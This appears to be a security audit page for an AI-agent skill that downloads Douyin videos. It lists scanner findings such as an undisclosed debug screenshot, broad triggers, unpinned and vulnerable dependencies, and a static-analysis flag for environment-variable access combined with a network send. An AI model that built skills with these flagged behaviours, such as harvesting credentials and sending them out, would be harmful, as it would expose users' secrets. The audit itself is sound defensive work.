Back to skill

Security audit

🎵 抖音下载器

Security checks across malware telemetry and agentic risk

Overview

This appears to be a real Douyin video downloader with expected network, browser, and local file-saving behavior, but it has dependency and transparency issues users should review.

Install only if you are comfortable with a skill that downloads public Douyin content, runs Playwright/Chromium, and saves media plus metadata locally. Set an explicit save directory, disable metadata if unwanted, avoid large batch downloads, and prefer updating/pinning dependencies before regular use. The publisher should remove or gate the debug screenshot and narrow the triggers.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
Findings (9)

Context-Inappropriate Capability

Medium
Confidence
87% confidence
Finding
The code writes a local screenshot of a live browser session to disk without user consent, retention controls, or cleanup. Because the page is remote and may contain user-specific content, cookies-derived state, or other sensitive visual data, this can create unintended local data exposure beyond the downloader’s core function.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The README indicates that videos can be downloaded and metadata saved, but it does not clearly and prominently disclose that the skill writes files to disk and may persist metadata by default. In an agent skill context, insufficient disclosure about filesystem writes and data retention can lead to unintended storage of user-requested content or creator information, which is a meaningful safety and privacy concern even if it is not overtly malicious.

Vague Triggers

Medium
Confidence
89% confidence
Finding
The triggers `无水印` and `tiktok video` are broad enough to match common user requests outside the narrow intended scope, which can cause the skill to activate unexpectedly. Because the skill performs media downloading and local file saving, accidental invocation could lead to unintended downloads, storage use, or metadata collection without clear user intent.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The skill advertises downloading videos and saving metadata, but it does not clearly warn users that media and associated author/description data may be written to local storage. In a skill that handles third-party content, this omission increases privacy and transparency risk because users may not realize files and metadata are being persisted on disk.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
Saving a debug screenshot to disk without notice or opt-in creates a persistent artifact containing whatever the automated browser rendered at the time. In a downloader context, this is unnecessary to core functionality and can leak sensitive on-screen data to other local users, logs, backups, or later processes.

Unpinned Dependencies

Low
Category
Supply Chain
Content
"url": "https://github.com/openclaw/skills"
  },
  "dependencies": {
    "axios": "^1.6.0",
    "cheerio": "^1.0.0-rc.12",
    "playwright": "^1.58.2"
  },
Confidence
84% confidence
Finding
"axios": "^1.6.0"

Unpinned Dependencies

Low
Category
Supply Chain
Content
"dependencies": {
    "axios": "^1.6.0",
    "cheerio": "^1.0.0-rc.12",
    "playwright": "^1.58.2"
  },
  "optionalDependencies": {
    "fluent-ffmpeg": "^2.1.2"
Confidence
76% confidence
Finding
"playwright": "^1.58.2"

Unpinned Dependencies

Low
Category
Supply Chain
Content
"playwright": "^1.58.2"
  },
  "optionalDependencies": {
    "fluent-ffmpeg": "^2.1.2"
  },
  "clawhub": {
    "displayName": "🎵 抖音下载器",
Confidence
74% confidence
Finding
"fluent-ffmpeg": "^2.1.2"

Known Vulnerable Dependency: axios==1.6.0 — 10 advisory(ies): CVE-2025-62718 (Axios has a NO_PROXY Hostname Normalization Bypass that Leads to SSRF); CVE-2026-42044 (Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget in `pars); CVE-2026-25639 (Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig) +7 more

High
Category
Supply Chain
Confidence
98% confidence
Finding
axios==1.6.0

VirusTotal

66/66 vendors flagged this skill as clean.

View on VirusTotal

Static analysis

Detected: suspicious.env_credential_access

Environment variable access combined with network send.

Critical
Code
suspicious.env_credential_access
Location
src/downloader.js:188